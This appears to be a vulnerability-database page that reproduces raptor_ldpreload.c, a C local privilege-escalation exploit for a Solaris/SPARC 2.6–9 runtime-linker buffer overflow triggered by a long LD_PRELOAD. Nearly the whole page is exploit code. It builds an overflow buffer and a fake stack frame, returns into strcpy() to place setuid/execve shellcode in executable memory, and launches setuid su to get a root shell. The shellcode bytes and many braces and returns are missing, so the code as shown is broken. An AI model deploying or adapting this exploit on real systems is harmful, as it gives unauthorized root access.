Lucene search

HistoryOct 28, 2006 - 12:00 a.m.

Solaris 2.6/7/8/9 ( Local Root Exploit (sparc)


0.0004 Low




No description provided by source.

 * $Id: raptor_ldpreload.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 * raptor_ldpreload.c - local, Solaris/SPARC 2.6/7/8/9
 * Copyright (c) 2003-2004 Marco Ivaldi <[email protected]>
 * Stack-based buffer overflow in the runtime linker,, on Solaris 2.6
 * through 9 allows local users to gain root privileges via a long LD_PRELOAD
 * environment variable (CAN-2003-0609).
 * This exploit uses the technique, to effectively bypass the
 * non-executable stack protection (noexec_user_stack=1 in /etc/system). This
 * is a weird vulnerability indeed: the standard ret-into-stack doesn't seem 
 * to work properly for some reason (SEGV_ACCERR), and at least my version of 
 * Solaris 8 (Generic_108528-13) is very hard to exploit (how to reach ret?).
 * Usage:
 * $ gcc raptor_ldpreload.c -o raptor_ldpreload -ldl -Wall
 * $ ./raptor_ldpreload
 * [...]
 * # id
 * uid=0(root) gid=1(other)
 * # 
 * Vulnerable platforms:
 * Solaris 2.6 with 107733-10 and without 107733-11 [untested]
 * Solaris 7 with 106950-14 through 106950-22 and without 106950-23 [untested]
 * Solaris 8 with 109147-07 through 109147-24 and without 109147-25 [untested]
 * Solaris 9 without 112963-09 [tested]

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	INFO1	"raptor_ldpreload.c - local, Solaris/SPARC 2.6/7/8/9"
#define	INFO2	"Copyright (c) 2003-2004 Marco Ivaldi <[email protected]>"

#define	VULN	"/usr/bin/su"		// default setuid target
#define	BUFSIZE	1700 			// size of the evil buffer
#define	FFSIZE	64 + 1			// size of the fake frame
#define	DUMMY	0xdeadbeef		// dummy memory address
#define	ALIGN	3			// needed address alignment

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */
/* setuid() */
/* execve() */

/* globals */
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int 	add_env(char *string);
void	check_zero(int addr, char *pattern);
int	search_ldso(char *sym);
int	search_rwx_mem(void);
void 	set_val(char *buf, int pos, int val);

 * main()
int main(int argc, char **argv)
	char	buf[BUFSIZE], ff[FFSIZE];
	char	platform[256], release[256];
	int	i, offset, ff_addr, sc_addr, str_addr;
	int	plat_len, prog_len, rel;
	char	*arg[2] = {"foo", NULL};
	int	arg_len = 4, arg_pos = 1;

	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
	int	ret = search_ldso("strcpy");
	int	rwx_mem = search_rwx_mem();

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* prepare the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;
	memcpy(buf, "LD_PRELOAD=/", 12);
	buf[sizeof(buf) - 2] = '/';

	/* prepare the fake frame */
	bzero(ff, sizeof(ff));

	 * saved %l registers
	set_val(ff, i  = 0, DUMMY);		/* %l0 */
	set_val(ff, i += 4, DUMMY);		/* %l1 */
	set_val(ff, i += 4, DUMMY);		/* %l2 */
	set_val(ff, i += 4, DUMMY);		/* %l3 */
	set_val(ff, i += 4, DUMMY);		/* %l4 */
	set_val(ff, i += 4, DUMMY);		/* %l5 */
	set_val(ff, i += 4, DUMMY);		/* %l6 */
	set_val(ff, i += 4, DUMMY);		/* %l7 */

	 * saved %i registers
	set_val(ff, i += 4, rwx_mem);		/* %i0: 1st arg to strcpy() */
	set_val(ff, i += 4, 0x42424242);	/* %i1: 2nd arg to strcpy() */
	set_val(ff, i += 4, DUMMY);		/* %i2 */
	set_val(ff, i += 4, DUMMY);		/* %i3 */
	set_val(ff, i += 4, DUMMY);		/* %i4 */
	set_val(ff, i += 4, DUMMY);		/* %i5 */
	set_val(ff, i += 4, sb - 1000);		/* %i6: frame pointer */
	set_val(ff, i += 4, rwx_mem - 8);	/* %i7: return address */

	/* fill the envp, keeping padding */
	sc_addr = add_env(ff);
	str_addr = add_env(sc);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(VULN) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the needed addresses */
	ff_addr = sb - offset + arg_len;
	sc_addr += ff_addr;
	str_addr += ff_addr;

	/* set fake frame's %i1 */
	set_val(ff, 36, sc_addr);		/* 2nd arg to strcpy() */
	/* fill the evil buffer */
	for (i = 12 + ALIGN; i < 1296; i += 4)
		set_val(buf, i, str_addr);	/* must be a valid string */
	/* to avoid distance bruteforcing */
	for (i = 1296 + ALIGN; i < BUFSIZE - 12; i += 4) {
		set_val(buf, i, ff_addr);
		set_val(buf, i += 4, ret - 4);	/* strcpy(), after the save */

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using string address\t: 0x%p\n", (void *)str_addr);
	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
	fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);

 * add_env(): add a variable to envp and pad if needed
int add_env(char *string)
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);


 * check_zero(): check an address for the presence of a 0x00
void check_zero(int addr, char *pattern)
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);

 * search_ldso(): search for a symbol inside
int search_ldso(char *sym)
	int		addr;
	void		*handle;
	Link_map	*lm;

	/* open the executable object file */
	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {

	/* get dynamic load information */
	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {

	/* search for the address of the symbol */
	if ((addr = (int)dlsym(handle, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);

	/* close the executable object file */

	check_zero(addr - 4, sym);

 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ using the proc filesystem
int search_rwx_mem(void)
	int	fd;
	char	tmp[16];
	prmap_t	map;
	int	addr = 0, addr_old;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", (int)getpid());
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "can't open %s\n", tmp);

	/* search for the last RWX memory segment before stack (last - 1) */
	while (read(fd, &map, sizeof(map)))
		if (map.pr_vaddr)
			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
				addr_old = addr;
				addr = map.pr_vaddr;

	/* add 4 to the exact address NULL bytes */
	if (!(addr_old & 0xff))
		addr_old |= 0x04;
	if (!(addr_old & 0xff00))
		addr_old |= 0x0400;


 * set_val(): copy a dword inside a buffer
void set_val(char *buf, int pos, int val)
	buf[pos] =      (val & 0xff000000) >> 24;
	buf[pos + 1] =  (val & 0x00ff0000) >> 16;
	buf[pos + 2] =  (val & 0x0000ff00) >> 8;
	buf[pos + 3] =  (val & 0x000000ff);


0.0004 Low


